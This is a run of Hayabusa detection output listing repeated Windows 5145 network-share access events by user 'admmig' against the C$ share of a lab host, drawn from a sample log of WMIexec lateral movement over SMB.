2021-04-22 20:32:31.873 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S88747207#\e998cb40c6a3657a6090a653616ee0d2 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.873 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Sa56e3556# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.873 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Sa56e3556#\2da102d7caf13b4e082aabda839cabfd : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.890 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Sb6a1f1bc# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.890 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Sb6a1f1bc#\05a925477e72821ff9fa9527061d8527 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.890 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.T9d753d8c# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.890 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.T9d753d8c#\9543db50e278526c3ba397cf5c7862cb : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.890 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Te49ad7d9# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.890 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Te49ad7d9#\1834f24e507a831c635b80067fc7a428 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.890 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Te3736ca4# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.890 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Te3736ca4#\f98240dfe778b4b39045d17817485b8a : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.906 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ud0e65fb9# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.906 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ud0e65fb9#\bb434af0d1c0846eba8f3fc7986a5cdc : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.906 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.906 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\b59fee046dfa048ec5f5180dc88f835d : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.906 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V4381984f# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.906 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V4381984f#\07b01287acdaf4ef356c3918db535afd : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Vb0a86591# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Vb0a86591#\a45750f13b28bdd0fb2adff38d6cd46f : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Vf4833439# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Vf4833439#\fdcc95e5c05a2fec4f9c33b7e325ccd8 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.VisualC : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.VisualC\999abcb4ea322b606c8f211d12ccb5a0 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W0bb5dac4# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W0bb5dac4#\f5bca9052007da4e51412dc152a52942 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.937 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2bac6884# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.937 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2bac6884#\26a1a0abca839c13b1337a076531d7a2 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.937 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2d29a719# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.937 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2d29a719#\d0b3dad21720f265098f1e94984349f8 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.937 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2d6979e4# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.937 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2d6979e4#\3e37b5062bf0419283b3384af5deb445 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.937 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2ded559f# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.937 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2ded559f#\7d512c9625a371ff23fac5628a0e68f9 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.953 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W3cdb5602# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.953 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W3cdb5602#\6423a4306ce0876f0093a7f421bb7e5a : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.969 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W6c95e797# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.969 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W6c95e797#\8780975ab811e02b5246582c27ea6cda : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.969 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W6dcfceb1# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.969 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W6dcfceb1#\64783b930c916ed9a5041885582dd1f1 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.969 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W7b7c0837# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.969 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W7b7c0837#\fa70f9411efd4c4e624a68d30b61b1b7 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.984 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W9e7db7c5# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.984 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W9e7db7c5#\129a7094f09543b72571da3208c88188 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.984 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W9e8926d3# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.984 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W9e8926d3#\86d7c67af3a964bb8d312cffb20064f4 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.984 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W15cd0137# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.984 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W15cd0137#\37435834252683aa469b56ff5b1fa582 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.000 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W37d1a032# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.000 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W37d1a032#\3000cd8689f492cfebdd90745d8ff4f5 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.000 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W39c436dd# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.000 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W39c436dd#\1e419fc634fa508e323ce21b5ed38e24 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.015 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W69ef49d2# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.015 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W69ef49d2#\3904c1c8a3c65252ed404558b48ebbc1 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.015 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W71daf281# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.015 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W71daf281#\4dc6f876453e5e2ebf2a9ee674543449 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.015 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W81a3882f# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.031 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W81a3882f#\a85f95161dcf12987a79a1b41adbdb9c : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
